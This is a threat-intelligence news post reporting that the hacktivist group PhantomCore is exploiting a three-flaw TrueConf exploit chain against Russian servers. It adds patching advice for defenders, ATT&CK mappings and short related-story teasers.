PhantomCore Exploits TrueConf Vulnerabilities in Russian Networks

/MEDIUM
Written by SCW Vulnerability Desk Vulnerability Intelligence
SCW threat-intelvulnerabilitydata-breach
PhantomCore Exploits TrueConf Vulnerabilities in Russian Networks

Pro-Ukrainian hacktivist group PhantomCore has been actively targeting Russian servers running TrueConf video conferencing software since September 2025. The Hacker News, citing a report by Positive Technologies, indicates that PhantomCore is leveraging an exploit chain comprising three vulnerabilities. These flaws allow for remote command execution on susceptible TrueConf installations.

This isn’t a spray-and-pray operation. PhantomCore is clearly focused on specific targets, likely government or critical infrastructure within Russia, given TrueConf’s common use in those sectors. The use of a multi-vulnerability exploit chain demonstrates a higher level of sophistication than typical hacktivist activity, suggesting dedicated resources for vulnerability research or access to advanced exploits.

For defenders, this highlights the critical risk of neglecting patching for internal-facing, collaboration-focused applications. While the target here is Russia, the tactics are universal. Attackers consistently pivot from easily exploitable collaboration tools to deeper network access. This is a stark reminder that even seemingly innocuous software can be a significant attack vector if not rigorously secured and updated.

What This Means For You

  • If your organization uses TrueConf or any similar self-hosted video conferencing solution, you need to confirm that all instances are fully patched against known vulnerabilities, especially those allowing remote code execution. TrueConf servers are often exposed to facilitate external communications, making them prime targets. Audit your network for unauthorized access or unusual activity originating from these servers immediately.

Related ATT&CK Techniques

T1190 Exploit Public-Facing Application Initial Access T1059.004 Command and Scripting Interpreter: Unix Shell Execution

🛡️ Detection Rules

3 rules · 6 SIEM formats

3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.

critical T1190 Initial Access

PhantomCore Exploitation of TrueConf Vulnerabilities

Sigma YAML — free preview

Source: Shimi's Cyber World · License & reuse

✓ Sigma · Splunk SPL Sentinel KQL Elastic QRadar AQL Wazuh Get rules for your SIEM →

Indicators of Compromise

IDTypeIndicator
TrueConf-Exploit-Chain RCE TrueConf video conferencing software
TrueConf-Exploit-Chain RCE Exploit chain comprising three vulnerabilities

Written by SCW Vulnerability Desk

Take action on this incident
📡 Monitor trueconf.com Free · 1 watchlist slot · instant alerts on new breaches 🔍 Threat intel on TrueConf All breaches, IOCs & vendor exposure

Related coverage on TrueConf

Microsoft Teams Impersonation Leads to Corporate Network Breaches

Hackers are actively impersonating Microsoft Teams help desk personnel to infiltrate corporate networks. The Record by Recorded Future reports that these attackers trick victims into...

threat-inteldata-breachgovernmentmalwaremicrosoft
/SCW Research /MEDIUM /⚙ 3 Sigma

Microsoft Windows Patch Incomplete, APT28 Exploits Zero-Click Vulnerability

Microsoft's attempt to patch a critical Windows vulnerability has fallen short, leaving a zero-click attack vector wide open. SecurityWeek reports that the initial flaw was...

threat-intelvulnerabilitymicrosoft
/SCW Vulnerability Desk /HIGH /⚑ 3 IOCs /⚙ 3 Sigma

Anthropic Claude Mythos: AI-Driven Vulnerability Discovery Changes Remediation Math

Anthropic’s Claude Mythos Preview, announced on April 7, is reshaping the vulnerability discovery landscape. The Hacker News reports that this powerful cybersecurity-focused AI system can...

threat-intelvulnerability
/SCW Vulnerability Desk /MEDIUM /⚑ 1 IOC